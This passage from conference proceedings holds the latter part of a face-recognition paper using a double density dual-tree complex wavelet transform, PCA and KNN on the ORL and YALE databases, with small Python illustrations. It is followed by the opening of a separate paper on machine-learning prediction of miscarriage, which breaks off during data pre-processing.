• An enhanced technique employing the double density dual-tree complex wavelet transform (DD_DTCWT) and principal component analysis (PCA) for large-scale robust feature extraction.
• The proposed work is performed without any preprocessing techniques for
normalization on YALE and ORL face database, respectively. The classification
is performed with K-nearest neighbor (KNN) linear classifier.

• Furthermore, the proposed work accomplishes a comparison of the attained results with state-of-the-art approaches.
Also, to assess the performance and efficiency of the proposed work, the experiments are performed on a system with 8 GB RAM and a 2.40 GHz 64-bit Intel Core processor. The system has MATLAB 2019 installed for processing.
The remainder of the paper is organized as follows. Section 2 details the proposed methodology and preliminary information related to the methods utilized in the work. Experimental results are presented in Section 3. Section 4 illustrates the discussion on the comparative analysis of the obtained outcomes. Finally, the conclusion and future possibilities of the proposed system are covered in Section 5 of the paper.

2 Preliminaries and Proposed Methodology

2.1 Wavelet Transformation Techniques

This section gives a preliminary description of the major multi-resolution spectral analysis of images using wavelet transformation techniques. The discrete wavelet transform (DWT) analyzed in the study [12] shows that a digital image can be decomposed into "approximation coefficients", which contain the low-frequency content, and "detailed coefficients", which contain the high-frequency components of the image. A 2D-DWT decomposes an image into three detailed sub-bands (LH, HL and HH) corresponding to vertical, horizontal and diagonal directional details, respectively. The LL (approximation) sub-image provides the low-frequency details of the image. Major shortcomings of the DWT are its shift (translation) variance and its lack of directional selectivity, with only a few orientations: 0°, ±45° and ±90°.
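As a hedged illustration of this sub-band structure (using the PyWavelets library with a random placeholder image; this is not the implementation used in the paper), a single-level 2D-DWT can be computed as follows.

# Sketch: single-level 2D-DWT giving the LL (approximation) sub-band and
# the three detail sub-bands; the input is a random placeholder image.
import numpy as np
import pywt

image = np.random.rand(112, 92)                 # placeholder for a face image
LL, (LH, HL, HH) = pywt.dwt2(image, "haar")     # approximation + detail sub-bands
print(LL.shape, LH.shape, HL.shape, HH.shape)   # each roughly half the input size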
Dual tree complex wavelet transform (DTCWT) is introduced in the study [13]
to overcome the weakness of DWT which provides less discrimination power for
face image features. This technique solves the issue of shift or translation variance in
images as any small change in input function does not cause interference in wavelet
coefficients. DTCWT also provides good angular resolution, giving better directional selectivity in terms of orientation angles. In DTCWT, the filter bank used at the first level of decomposition must differ from the filters used at subsequent stages. DTCWT generates wavelet coefficients of three orientations, namely LH, HL and HH. The six directional sub-bands formed at the real and imaginary trees are LH+, HH+, HL+, LH−, HH− and HL−, describing edges (high-frequency components) oriented at −75°, −45°, −15°, +15°, +45° and +75°, respectively.
Double density discrete wavelet transform (DD_DWT) is a variant of DWT
proposed in study of Selesnick in 2004 [14]. This technique has a 3-channel filter
bank structure which has one scaling (low pass) and two wavelets (high pass) func-
tions. Unlike DTCWT, in this method, same filters are used in all subsequent stages

of decomposition. In the 2D-DD_DWT transformation, there is one low-pass filter and two high-pass filters, which are applied alternately over the rows and columns of the image. It provides wavelet coefficients with eight orientations. The output of each filter is down-sampled by a factor of two at each level. DD_DWT is nearly shift invariant and provides more detailed sub-bands (directional wavelets). However, some of these wavelets still lack spatial orientation and directional selectivity.
Double Density Dual Tree Complex Wavelet Transform
Double density dual-tree complex wavelet transform (DD_DTCWT) technique is a
conglomerate of DTCWT and DD_DWT. Therefore, this method includes the advan-
tages of both. DD_DTCWT overcomes the limitations of DD_DWT by providing
more directional wavelets with shift invariance [15]. This technique has two trees
which provides real and imaginary information of wavelets, respectively. Each tree
structure is a 3-channel filter bank which has one scaling and two wavelet functions.
The image is passed through one low-pass filter and two high-pass filters in both
TreeA and TreeB as illustrated in Fig. 1.
Unlike DTCWT, this wavelet transform generates wavelet coefficients of eight
orientations and each orientation gives a specific direction. The orientations are

Fig. 1 Structural implementation of double density dual-tree complex wavelet transform



[H1_H2, H1_H3, H2_H1, H2_H2, H2_H3, H3_H1, H3_H2, H3_H3], where H1 represents the low-pass filter and [H2, H3] are the two high-pass filters. Different analysis
filters are used in first stage and next higher levels of decomposition. In this way,
DD_DTCWT provides good directional selectivity by small-scale feature selection
also. Each tree contains one low-pass (approximation) sub-band and eight detailed
(high pass) sub-bands, respectively. The design implementation of DD_DTCWT at
first level of decomposition is demonstrated in Fig. 1.

2.2 Principal Component Analysis (PCA)

PCA is a feature extraction technique utilized for dimensionality reduction by representing human faces in lower dimensions, as proposed by Kirby in 1990; this was developed into the Eigenface approach in 1991 by Turk & Pentland [16]. In the proposed work, PCA is applied to extract robust feature vectors after transforming an image using the DD_DTCWT technique. The major steps involved in PCA are discussed as follows.
i. Consider a face image database for training and testing that can be utilized in face recognition. Each N × N image in the dataset is converted into an N^2 × 1 column face vector; together these form the face vector space.
ii. These face vectors are then normalized: the average face vector (mean face) is calculated and subtracted from each face vector. The resulting normalized face vector matrix is denoted by A.
iii. To calculate the eigenvectors, a covariance matrix Q is computed as Q = A A^T, where A is the matrix formed by all normalized face vectors, with dimension N^2 × M (M is the total number of face vectors in the dataset).
iv. The size of this covariance matrix is N^2 × N^2, which is too large. To reduce the computation, Turk & Pentland reframed it as Eq. (1):

$$Q = A^{T} A \tag{1}$$

The covariance matrix is then of dimension M × M in the reduced subspace.


v. Compute the eigenvalues and eigenvectors (known as Eigenfaces or principal components).
vi. Select the 'k' best principal components (eigenvectors with the highest eigenvalues), which best describe the features as they capture the highest variance; the rest are discarded. The selected eigenfaces together form a weighted projection matrix W.
vii. Both the training and testing spaces are projected onto the PCA projection as expressed in Eqs. (2) and (3).

Training Projection = W^T * training_space    (2)

Testing Projection = W^T * test_space    (3)
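A hedged numerical sketch of these steps (NumPy, with random placeholder vectors standing in for the DD_DTCWT approximation coefficients) follows; it uses the reduced M × M covariance trick of Eq. (1) and the projections of Eqs. (2) and (3).

# Sketch of the eigenface-style PCA steps with the reduced M x M
# covariance trick; the face vectors here are random placeholders.
import numpy as np

M, D = 120, 56 * 46                      # M face vectors of dimension D (N^2)
faces = np.random.rand(D, M)             # each column is one face vector
mean_face = faces.mean(axis=1, keepdims=True)
A = faces - mean_face                    # normalized face vectors (step ii)

Q = A.T @ A                              # reduced covariance matrix, Eq. (1)
eigvals, eigvecs = np.linalg.eigh(Q)     # eigen-decomposition (step v)
order = np.argsort(eigvals)[::-1]        # sort by decreasing eigenvalue

k = 70                                   # keep the k best components (step vi)
W = A @ eigvecs[:, order[:k]]            # map back to image space: eigenfaces
W /= np.linalg.norm(W, axis=0)           # normalize each eigenface

train_proj = W.T @ A                     # Eq. (2): project the training space
test_face = np.random.rand(D, 1) - mean_face
test_proj = W.T @ test_face              # Eq. (3): project a test face
print(train_proj.shape, test_proj.shape)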

2.3 Classification

K-nearest neighbor is a widely used supervised classification technique used to


compute the similarity between unknown image and trained images. KNN helps
in classifying the data points based on class label of considered neighbors [17]. This
classifier employs distance metric and majority voting functions for classification.
In this work, the Euclidean distance measure D(X, Y) is utilized for the YALE database; it calculates the distance between a test face vector X and a training feature vector Y as shown in Eq. (4).

$$D(X, Y) = \sqrt{\sum_{i=1}^{n} (X_i - Y_i)^2} \tag{4}$$

The work has utilized cosine angle distance [18] metric [cos(X, Y )] for ORL
database which calculates the distance as provided in Eq. (5):
$$\cos(X, Y) = \frac{\sum_{i=1}^{n} X_i Y_i}{\sqrt{\sum_{i=1}^{n} X_i^2}\,\sqrt{\sum_{i=1}^{n} Y_i^2}} \tag{5}$$

The distances between test image and each face vector in training sample are
arranged in increasing order and the minimum distance is examined for providing
the nearest neighbor (matched image). To determine the efficiency and accuracy of
proposed system, a recognition rate is calculated by considering the percentage ratio
of matched images with total number of images in test set.
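A hedged sketch of this nearest-neighbor matching with the two distance measures of Eqs. (4) and (5) (NumPy, with placeholder projected vectors) is given below; note that for the cosine measure the closest match is the one with the largest value.

# Sketch: 1-nearest-neighbor matching with Euclidean distance (Eq. 4) and
# cosine angle distance (Eq. 5); inputs are random placeholders.
import numpy as np

train = np.random.rand(100, 70)           # projected training vectors (rows)
labels = np.random.randint(0, 15, 100)    # their subject labels
test = np.random.rand(70)                 # one projected test vector

# Euclidean distance, Eq. (4): smallest value is the nearest neighbor
d_euc = np.sqrt(((train - test) ** 2).sum(axis=1))

# Cosine measure, Eq. (5): largest value is the closest match
d_cos = (train @ test) / (np.linalg.norm(train, axis=1) * np.linalg.norm(test))

print("Euclidean match:", labels[np.argmin(d_euc)])
print("Cosine match:   ", labels[np.argmax(d_cos)])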

2.4 Proposed Methodology

In proposed work, the face recognition is performed in two phases namely training
and testing (recognition) of face images. In first stage, the robust feature extraction
on considered face image database is performed based on DD_DTCWT technique
with different filters in first level and next subsequent levels of decomposition.
The selection of the appropriate sub-band and level of decomposition is performed through extensive experiments, by varying the number of decomposition levels and the number of training images per subject of the face database. At each level, the approximation sub-image is selected for further decomposition, as it yields better results. Furthermore, the dimensionality reduction of the transformed face images

is performed by PCA by projecting the training approximation coefficients onto PCA


projection subspace (lower dimension). In the second phase, the recognition of face
images is performed by projecting the test samples on PCA projection subspace
on same scale and sub-band selection as of training set. The classification of test
samples is accomplished by using K-nearest neighbor classifier (KNN) that exploits
two distance measures namely Euclidean and Cosine angle measure on YALE and
ORL database, respectively, for achieving better recognition rate. A broad outline of
proposed methodology is represented in Fig. 2.

Fig. 2 Block diagram of proposed methodology



3 Experimental Results

This section provides description of datasets that are utilized in the work. In another
part of section, the selection of DD_DTCWT sub-band and level of decomposition
for comprehensive experiments is also illustrated.

3.1 Dataset

The proposed work utilizes the ORL and YALE face image databases to estimate the accuracy rate. The ORL database consists of 400 grayscale images, each with resolution 112 × 92, in PNG format. This database includes 40 subjects, each with 10 varying images. Likewise, the YALE database has 165 images of 15 subjects; each subject has 11 different images with resolution 243 × 320 in GIF format. The face images in the YALE database have varying effects of illumination and facial expression such as sad, happy, wink, surprised, etc.
The decomposition of ORL sample face image at level 1 by utilizing DD_DTCWT
is shown in Fig. 3a. This figure depicts the Lowpass/Approximation sub-band thus
formed for both real and imaginary parts, respectively. The detailed sub-band of ORL
face image (first orientation) is represented in Fig. 3b.

Fig. 3 Decomposition of ORL face image using DD_DTCWT: a Approximation sub-image formed
on real and imaginary trees. b Detailed/High pass sub-bands formed on real and imaginary trees

Table 1 Experimental results on ORL database (400 total images) with decomposition level 3 and
approximation sub-band selection
Number of train images for each subject (total Recognition rate (%) Computational time (s)
number of testing images)
5(200) 93.5 3.063
6(160) 95 2.495
7(120) 96.6 1.905
8(80) 97.5 1.448

3.2 Selection of DD_DTCWT Sub-Band and Level


of Decomposition

The selection of the appropriate sub-band and level of decomposition is a critical step in the implementation of the proposed system in order to examine efficient feature vector formulation and recognition rates. The experiments are performed extensively by varying the
number of train images for every subject and decomposition levels on both approx-
imation and detailed sub-bands which are obtained by DD_DTCWT. Additionally,
in this work, the images are selected in sequential manner from each subject of both
database and the remaining set of images are utilized in testing phase.
Initially, the work examined the results at first level of decomposition by consid-
ering 50% of total images from both ORL and YALE database in training phase
on approximation (c A) and detailed (cD) sub-bands, respectively. Then obtained
results are analyzed by varying the scale between 1 and 4 on approximate sub-band
as detailed sub-band provided poor recognition rate.
The training set of the ORL database comprises 200, 240, 280 and 320 images. Similarly, for the YALE database, the training set includes 90, 105, 120 and 135 images. It has been observed that promising results on both the YALE and ORL databases are obtained at level 3.
mation sub-band and at decomposition level 3 and sub-dimensions (principal compo-
nents) as 70. The results of ORL database in Table 1 depict that highest recognition
rate of 97.5% is obtained with proposed technique. The attained percentage accuracy
is represented using line plot in Fig. 4.
Likewise, the experiment is performed using proposed technique on YALE
database at decomposition level 3 and approximation sub-band which yields impres-
sive result of 100% accuracy rate. The attained results are shown in Table 2 and
graphical plot is expressed in Fig. 5.

4 Comparative Analysis and Discussion

The comparison of the results obtained by the proposed methodology on the ORL and YALE databases with other state-of-the-art methods is performed in this section.

Fig. 4 Recognition rate of proposed approach on ORL database at decomposition level 3

Table 2 Results on YALE database (165 total images) with decomposition level 3 and
approximation sub-band selection
Number of train images for each subject (total Recognition rate (%) Computational time (s)
number of testing images)
6(75) 86.6 6.695
7(60) 88.3 4.594
8(45) 84.4 3.738
9(30) 100 2.295

The results attained with proposed approach on ORL database are compared with
five techniques namely, DWT_PCA_SVM, DWT_FLD_SVM, DWT_DLDA_SVM,
MODULAR-2DPCA and (MF_GF_HE)_PCA_MultiSVM as illustrated in Table 3.
In the similar manner, the experimental results obtained on YALE database are
compared with five techniques such as IKLDA_PNN, GSB2DLPP, MLTP_SVM,
HE_GLPF_Gabor_PCA_SVM and RRHE-RFDWPT. The summary of results
attained in above-stated previous work is presented in Table 4.
Consequently, the comparison observed in Table 4 demonstrates that the proposed
methodology provides promising results when compared with other techniques. It
is also observed that the RRHE-RFDWPT methodology [26] provides an accuracy rate

Fig. 5 Recognition rate of proposed approach on YALE database at decomposition level 3

Table 3 Comparison of proposed system with previous techniques on ORL database


Techniques Number of train images for each Recognition rate (%)
subject (total number of testing
images)
DWT_FLD_SVM [19] 6(160) 87
DWT_DLDA_SVM [19] 6(160) 89.60
MODULAR_2DPCA [20] 5(200) 91.5
(MF_GF_HE) _PCA_MultiSVM 5(200) 91.60
[21]
DWT_PCA_SVM [19] 6(160) 95
Proposed technique 6(160) 96.25

Table 4 Comparison of proposed system with previous techniques on YALE database


Techniques Number of train images for each Recognition rate (%)
subject (total number of testing
images)
IKLDA_PNN [22] 8(45) 83.80
GSB2DLPP [23] 8(45) 92.56
MLTP_SVM [24] 9(30) 93.33
HE_GLPF_Gabor_PCA_SVM [25] Not mentioned 95.00
RRHE-RFDWPT [26] 6(75) 98.67
Proposed technique 9(30) 100.0

of 98.67% with 6 training images as its best result, while utilizing preprocessing techniques for illumination normalization and invariant feature extraction. In our work, however, no preprocessing techniques are employed, yet a 100% recognition rate is attained with 9 images in the training set.

5 Conclusion

A large-scale DD_DTCWT and PCA-based robust feature extraction methodology


for face recognition was proposed in the paper. An extensive experiment was
performed on ORL and YALE database in which recognition rate of 97.5% and
100% were attained, respectively. Also, an apparent comparison has been made
between proposed methodology and existing state-of-the-art techniques. In the
proposed methodology, KNN classifier is utilized for classification of unknown
samples. Although preprocessing techniques for illumination normalization are not
been utilized, yet have achieved promising results on ORL and accurate results on
YALE database.
The technique significantly outperformed on other representative methods as
shown in Sect. 3. In future, large-size face image database will be utilized for
exploring the robustness of proposed approach. Moreover, different values of ‘k’
in KNN classifier will be explored and experimented for better results. Also, other
classifiers for recognition purpose will be examined for enhancing the performance
of proposed system.

References

1. Zhao, W., Chellappa, R., Phillips, P. J., & Rosenfeld, A. (2003) Face recognition: a literature
survey. ACM Computing Surveys, 35(4), 399–458.
2. Stan, Z. L., & Jain, A. (2005). In Handbook of face recognition, Springer.
3. Yadav, J., Rajpal, N., & Mehta, R. (2018). A new illumination normalization framework via
homomorphic filtering and reflectance ratio in DWT domain for face recognition. Journal of
Intelligent and Fuzzy Systems, 35, 5265–5277.
4. Yadav, J., Rajpal, N., & Mehta, R. (2018). An improved hybrid illumination normalization
and feature extraction model for face recognition. International Journal of Applied Pattern
Recognition, 149–170.
5. Selvakumar, K., Jerome, J., & Rajamani, K. (2016) Robust face identification using DTCWT
and PCA subspace based sparse representation. Multimedia Tools and Applications, 16073–
16092.
6. Wang, J. W. et al. (2018). Illumination compensation for face recognition using adaptive
singular value decomposition in the wavelet domain. Information Sciences, 435, 69–93.
7. Vishwakarma, V., & Dalal, S. (2020). A novel non-linear modifier for adaptive illumination
normalization for robust face recognition. Multimedia Tools Applications, 79, 11503–11529.
8. Lahaw, Z., Essaidani, D., & Seddik, H. (2018). Robust face recognition approaches using PCA,
ICA, LDA based on DWT, and SVM algorithms. In 2018 41st International Conference on

Telecommunications and Signal Processing (TSP) (pp. 1–5). Athens. https://doi.org/10.1109/


TSP.2018.8441452
9. Dalali, S., & Suresh, L. (2016). Daubechies wavelet based face recognition using modified LBP. Procedia Computer Science, 93, 344–350.
10. Huang, J., Zhang, Y., Zhang, H., & Cheng, K. (2019). Sparse representation face recognition
based on gabor and CSLDP feature fusion. In 2019 Chinese Control and Decision Conference
(CCDC) (pp. 5697–5701). Nanchang, China. https://doi.org/10.1109/CCDC.2019.8832457
11. Rajpal, N., Singh, A., & Yadav, J. (2018). An expression invariant face recognition based on
proximal support vector machine. In 2018 4th International Conference for Convergence in
Technology (I2CT) (pp. 1–7). Mangalore, India. https://doi.org/10.1109/I2CT42659.2018.9058243
12. Wang, M., Jiang, H., & Li, Y. (2010). Face recognition based on DWT/DCT and SVM. In
International Conference on Computer Application and System Modeling (ICCASM 2010)
pp. 507–510. Taiyuan. https://doi.org/10.1109/ICCASM.2010.5620666
13. Yadav, J., & Sehra, K. (2018). Large scale dual tree complex wavelet transform based robust
features in PCA and SVD subspace for digital image watermarking. Procedia Computer
Science, 132, 863–872. https://doi.org/10.1016/j.procs.2018.05.098
14. Selesnick, I. (2004). The double-density dual-tree DWT. IEEE Transactions on Signal
Processing, 52(5), 1304–1314. https://doi.org/10.1109/TSP.2004.826174
15. Sharma, M., Sharma, P. et al. (2019). Double density dual-tree complex wavelet transform-
based features for automated screening of knee-joint vibro-arthrographic signals. In Machine
intelligence and signal analysis (pp. 279–290). Springer.
16. Turk, M., & Pentland, A. (1991). Eigenfaces for recognition. Journal of Cognitive Neuro-
science, 3, 71–86.
17. Kathuria, D., & Yadav, J. (2016). An improved illumination invariant face recognition based
on gabor wavelet transform. In Conference on Information and Communication Technology
(CICT ). IEEE.
18. Yadav, J., Rajpal, N., & Vishwakarma, V. P. (2016). Face recognition using Symlet, PCA and cosine angle distance measure. In Ninth International Conference on Contemporary Computing (IC3), IEEE.
19. Bagherzadeh, S., Sarcheshmeh, A. et al. (2016). A new hybrid face recognition algorithm based
on discrete wavelet transform and direct LDA. In 23rd Iranian Conference on Biomedical Engi-
neering and 2016 1st International Iranian Conference on Biomedical Engineering (ICBME)
(pp. 267–270). Tehran. https://doi.org/10.1109/ICBME.2016.789096
20. Yan, X. (2016) Modular 2DPCA face recognition algorithm based on image segmentation.
In IEEE International Conference on Signal and Image Processing (ICSIP) (pp. 210–213).
Beijing. https://doi.org/10.1109/SIPROCESS.2016.7888254
21. Maw, H., Thu, S., & Mon, M. (2019). Face recognition based on illumination invariant tech-
niques model. In International Conference on Advanced Information Technologies (ICAIT )
(pp. 120–125). Yangon, Myanmar. https://doi.org/10.1109/AITC.2019.8921027
22. Ouyang, A., Liu, Y., Pei, S., et al. (2020). A hybrid improved kernel LDA and PNN algorithm
for efficient face recognition. Neurocomputing, 14(393), 214–222.
23. Liang, J., Hou, Z., Chen, C. et al. (2016). Supervised bilateral two-dimensional locality
preserving projection algorithm based on Gabor wavelet. SIViP, 10, 1441–1448. https://doi.
org/10.1007/s11760-016-0950-1
24. Rangsee, P., Raja, K., & Venugopal, K. (2018). modified local ternary pattern based face
recognition using SVM. In International Conference on Intelligent Informatics and Biomedical
Sciences (ICIIBMS) (pp. 343–350). Bangkok. https://doi.org/10.1109/ICIIBMS.2018.8549952
25. Li, M., Yu, X., Ryu, K., et al. (2018). Face recognition technology development with Gabor,
PCA and SVM methodology under illumination normalization condition. Cluster Computing,
21, 1117–1126. https://doi.org/10.1007/s10586-017-0806-7
26. Yadav, J., & Mehta, R. (2019). An improved illumination normalization and robust feature
extraction technique for face recognition under varying illuminations. Arabian Journal for
Science and Engineering, 44(11), 9067–9086.
A Miscarriage Prevention System Using
Machine Learning Techniques

Sarmista Biswas and Samiksha Shukla

Abstract Miscarriage or spontaneous abortion is the natural death of the fetus before
20 weeks of pregnancy. Stillbirth is the term used to refer to the fetus’s demise after
this period. Miscarriage can harm both the parents. One cannot reverse the outcome
of pregnancy. The only way to deal with miscarriage is to take certain precautions
and prevent it. With this objective, this study uses various machine learning tech-
niques such as Logistic Regression, K-Nearest Neighbors, and Random Forest to
predict a pregnancy’s outcome based on specific features. This paper focuses on
each model’s contribution and compares the algorithms’ efficiency based on some
standard evaluation measures.

Keywords Miscarriage · Logistic Regression · K-Nearest Neighbor · Random Forest

1 Introduction

The most common reason for losing a baby during pregnancy is miscarriage. An orga-
nization called the March of Dimes, working on maternal and child health, reported
that a 10–15% rate of miscarriage is present in women aware of their pregnancy.
Nearly 2 million babies are stillborn every year. These numbers can be higher as
there is no systematic recording for miscarriages and stillbirths, even in developed
countries.
There are various causes of miscarriage, some of the common ones being the
mother's age, chromosomal abnormalities, and uterine infections. Since spontaneous abortion is an irreversible phenomenon, it affects both physiological and psychological well-being. Recurrent miscarriages are likely to have far-reaching negative

S. Biswas (B) · S. Shukla


Department of Data Science, Christ University, Bangalore, India
e-mail: sarmista.biswas@science.christuniversity.in
S. Shukla
e-mail: samiksha.shukla@christuniversity.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 423
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_34

impacts on both the parents. The only beneficial solution is the prevention of miscarriage. Hence, it is necessary to predict whether a pregnant woman is likely to experience a miscarriage, based on some standard criteria, as early as possible. This work employs various machine learning classification algorithms for this purpose. The main objective is to facilitate early prediction of the pregnancy outcome in order to prevent miscarriage.
The remaining part of the paper appears in this manner. In Sect. 2, we overview
the existing literature on the prediction of miscarriage and its prevention. Section 3
explains the methodology used to achieve the study’s objective, followed by the
experimental results and discussion. Finally, we conclude and cite the references
used for the analysis.

2 Related Work

Magnus et al. [1] estimated the rate of miscarriage by associating it with the woman’s
age and pregnancy history using logistic regression, sensitivity analysis, and cluster
variance estimation. However, miscarriage can result from various underlying biolog-
ical and psychological causes, which form significant risk factors. The study did not
consider these factors.
Bruno et al. [2] designed a support decision system tool using support vector
machine to group recurrent pregnancy loss (RPL) patients into four risk classes
concerning the number of miscarriages. Unbalanced accuracy is present in the model
built using the most informative features. But when the authors used the features
recommended by the European Society of Human Reproduction and Embryology
(ESHRE), the accuracy obtained was very low. Hence, the system is less reliable.
In [3], the authors constructed and compared six machine learning classification
models, namely logistic regression, support vector machine (SVM), decision tree,
backpropagation neural network (BNN), extreme gradient boosting, and random
forest. They did this to predict the early pregnancy loss after noticing embryonic
cardiac activity, undergoing in-vitro fertilization-embryo transfer. They suggested
random forest for better clinical decisions by doctors, as its performance outperformed that of the other models. However, the study did not specify the reason for choosing BNN over any other neural network.
Pruthi et al. [4] predicted the high risks of pregnancy using decision tree, SVM,
Naïve Bayes, neural network associative classifier, and logistic regression by consid-
ering the factors responsible for pregnancy risk. They used a dataset containing all
the historic maternal information for this purpose. But it has not been noted in the
paper. No note of data mining or data processing exists through deep learning or any
advanced techniques which could have altered the accuracy.
Asri et al. [5] designed a framework for continuous monitoring where the unsu-
pervised ML algorithm K-means clustering was used in Apache Spark. The algo-
rithm takes in the data input received through the mobile application and sensors
and predicts the risk of miscarriage based on them. The execution time should be

fast with the highest classification accuracy. The drawback is that the model used
for giving the highest result does not provide much accuracy. Also, the data used is
highly biased by one particular age group.
Srinivasa et al. [6] presented four critical machine learning and deep learning
techniques in a theoretical manner to assist the gynecologists in improved treatment
of infertile women. They performed machine learning on the past infertility data and
then updated the deep learning process. However, the study did not address the practicality of this approach.
In [7], the authors conducted a survey study on 293 pregnant women attending an
early pregnancy assessment unit (EPAU). They designed the questionnaire based on
the literature review, also considering data from validated psychometric tests. They
used logistic regression to find the probability of miscarriage for all the independent
variables. The study found significant associative results but used no other algorithm
to validate the accuracy.
Koivu et al. [8] constructed classifiers using logistic regression, artificial neural
network, and gradient boosting decision trees on a CDC dataset with almost sixteen
million records. They further used the NYC dataset for evaluating the predictive
models created using the former dataset. Using the SELU network, they predicted early stillbirth. However, this network restricts improvements to within four layers. The prediction performance could be improved by balancing the classes in the data.
To stratify pregnancies with a high risk of stillbirth in [9], the authors developed a
set of different models to predict stillbirth. They did this using five machine learning
algorithms for binary classification, namely regularized logistic regression, decision
trees based on classification and regression trees (CART), random forest, extreme
gradient boosting, and a multilayer perceptron neural network. They validated the
method using the stratified K-folds technique. Although extreme gradient boosting
achieves the highest accuracy, the predictors’ accuracy varies throughout the gesta-
tional period. The exact timing for the predictors used was unavailable, and all risk
factors are unknown at a given point in time.
In [10], the authors developed a machine learning model using the extreme
gradient boosting algorithm to predict the presence of gestational diabetes mellitus
(GDM) in 19,331 women during their early pregnancy stage. They compared this
algorithm’s performance with a logistic model, which underperformed here. We do
not see any other algorithm for comparison, and hence, it will be unreliable to term
the model as the optimal one for the desired purpose.
The authors applied the C4.5 decision tree algorithm in [11] on the pregnancy
data in two ways: standardized and unstandardized. The classification performance
was better in standardized data with better accuracy and less error. The study was
limited to one algorithm for pregnancy-based classification.
A K-means clustering approach was applied in [12] on a controlled trial of preg-
nant women during the first trimester of pregnancy to analyze the presence of
hypothyroidism and the associated risk factors. As a result, the authors identified
three distinct clusters. Also, cluster analysis took into account the heterogeneity in

the study. But this analytical study lacked generalization, and the authors need to
consider a larger sample for validating the achieved associations.
Chang et al. [13] used the self-organizing map (SOM) technique and K-Modes
to generate co-morbidity-based clusters. Clusters were identified and validated for
diabetes mellitus and pregnancy cases ranging from standard to preterm birth. SOM
technique quickly and accurately identified cluster structures compared to the K-
Modes method. However, no domain expert validated the results, and therefore, we
cannot extend the results to clinical significance.
M. Tahir et al. [14] designed a neural network to classify preeclampsia based on
a dataset having 17 parameters. The algorithm was applied once with the previous preeclampsia (PE) case history and once excluding it; accuracy decreased significantly when the model did not use the previous PE case. The neural network resulted in more accurate classification than the other algorithms, namely Naive Bayes, K-nearest neighbors, linear regression, logistic regression, and support vector machine. Accuracy could be further increased using feature selection methods.
Andriani et al. [15] developed an automatic classification algorithm to detect
blighted ovum’s presence on the ultrasound image, using CNN. Detection of a
blighted ovum in the early stage can save the underdeveloped fetus. The model
trained the images using the Keras library in Python. The accuracy of detection was
less than 60%, which can improve by using more inputs for training and adding one
pre-processing stage to make it easy to differentiate for data input with high similarity
levels.
An expert system using artificial neural network and backpropagation algorithm
was proposed by Malyawati et al. [16] for early prediction of critical pregnancy.
Using 17 input parameters and five output classes, an accuracy of 78.248% was
achieved. All the symptoms considered formed a single pattern. The system used
various ratios for training and testing data. The small size of the input data may have
resulted in a compromise in the system’s accuracy.
In [17], the authors developed a multilayer neural network using 308 features of
multi-dimensional pre-pregnancy data, resulting in an accuracy of 89.2%. They did
this to detect and classify the critical pregnancy outcomes into six prominent labels.
The study limited the proposed framework’s comparison, with only two existing
algorithms: a five-layer fully connected neural network and a decision tree.
Krisnanik et al. [18] developed a pregnancy risk detections system (PRDS) to
detect the risk level of pregnancy based on the symptom(s) experienced by the preg-
nant woman. They did this through an observational study using the descriptive,
predictive, and prescriptive data analysis approach. The study provided a particular
recommendation of improvement to reduce pregnant women’s mortality rate with
higher risk levels during this period. However, the authors did not incorporate any
validation strategy and conducted the study on a very small sample.
In [19], the authors proposed a nature-inspired algorithm called particle swarm
optimization (PSO) to reduce the cost of multilayer perceptron (MLP). This technique
was better in precision and price for the clinical decision support systems (CDSSs)

used for pregnancy care. The study found the PSO algorithm to have early conver-
gence. Hence, this failed to be the best method for optimizing other ANN-based
techniques’ parameters.
Shafi et al. [20] presented some machine learning algorithms, namely random
forest, K-nearest neighbor, decision tree, support vector machine, and multilayer
perceptron, to propose a cleft prevention solution in the mother’s womb. Cleft is a
gap in the upper lip and the baby’s mouth roof during development in the uterus.
Multilayer perceptron, being a deep neural network, gave more accurate results. But
the data inputs for the prediction are comparatively less.
Moreira et al. [21] did a performance-based comparative study of the Bayes-based
machine learning techniques to determine the optimal algorithm for the classification
of hypertensive disorders during pregnancy. They did this using the cross-validation
method. The study’s scope did not extend to incorporating other machine learning
classification techniques.
In [22], the authors used the Naïve Bayes method for the Intra-Uterine Growth
Restriction (IUGR) diagnosis in pregnancy. The presence of IUGR indicates the
fetus to grow smaller than the expected standard size, thus, affecting the safety of the
woman and the fetus. Hence, we can apply this study to detect such abnormalities in
pregnant women. However, using one model has limited the scope of the study.
Tayal et al. [23] compared the efficiency of different data mining techniques and
identified decision tree as the most efficient algorithm in accuracy and specificity. The
study explored pregnancy health and new-born health issues but found no concrete
solution regarding a topic.
In [24], the authors proposed a Gaussian Naïve Bayes model to identify the risk
of abortion in pregnancy and reduce fetal mortality. They considered variables for
this purpose. The accuracy obtained was 96% for the balanced dataset. The model
is not embedded to provide useful results for medical experts.
In [25], the authors tried to make an early prediction of preterm delivery using
EHG recordings for a particular gestation period. Random forest classifier combined
with ADASYN provided an accuracy of 99.23%. This approach could predict the
classification for shorter EHG recordings, but the study did not explore the results’
robustness and validation.

3 Methodology

In this study, three machine learning algorithms, namely K-Nearest Neighbor,


Logistic Regression, and Random Forest, classify the data into two categories. Hence,
this is a binary classification problem (Fig. 1).

3.1 Data Collection

The dataset used for miscarriage detection has been taken from a GitHub repository.
It was downloaded as a comma-separated values (CSV) file and loaded into the Python
environment. Previously, Asri et al. [26] collected the primary data using a mobile
phone application and healthcare sensors.
The dataset has one million (ten lakh) records and ten attributes of interest: unique record
ID, maternal age, body mass index, number of previous miscarriages, physical
activity, location, body temperature, heart rate variability, stress, and blood pressure.
The target variable has two labels: 1 and 0, which denote the occurrence and
non-occurrence of miscarriage, respectively.
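As a minimal illustrative sketch (the file name miscarriage_data.csv and the column names used here are assumptions for illustration, not details given by the authors), the CSV file can be loaded and checked in Python as follows:

    # Minimal sketch: load the downloaded CSV file and inspect it with Pandas.
    # The file name and column names below are illustrative assumptions.
    import pandas as pd

    df = pd.read_csv("miscarriage_data.csv")
    print(df.shape)                      # expected: one million rows, ten columns
    print(df.isnull().sum())             # confirm there are no missing values
    print(df["target"].value_counts())   # 1 = miscarriage, 0 = no miscarriage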

3.2 Data Pre-processing

The dataset has no missing values, as verified using the Pandas library in Python. The
variables in the dataset are both continuous and categorical. While age, BMI, temperature,
and BPM are continuous in nature, activity, location, stress, and blood pressure
are categorical variables. It is evident in Fig. 2 that age is positively correlated with
the target, while BMI, temperature, and BPM are negatively correlated with it.
High-intensity physical activity and a high stress level increase the risk of miscarriage.
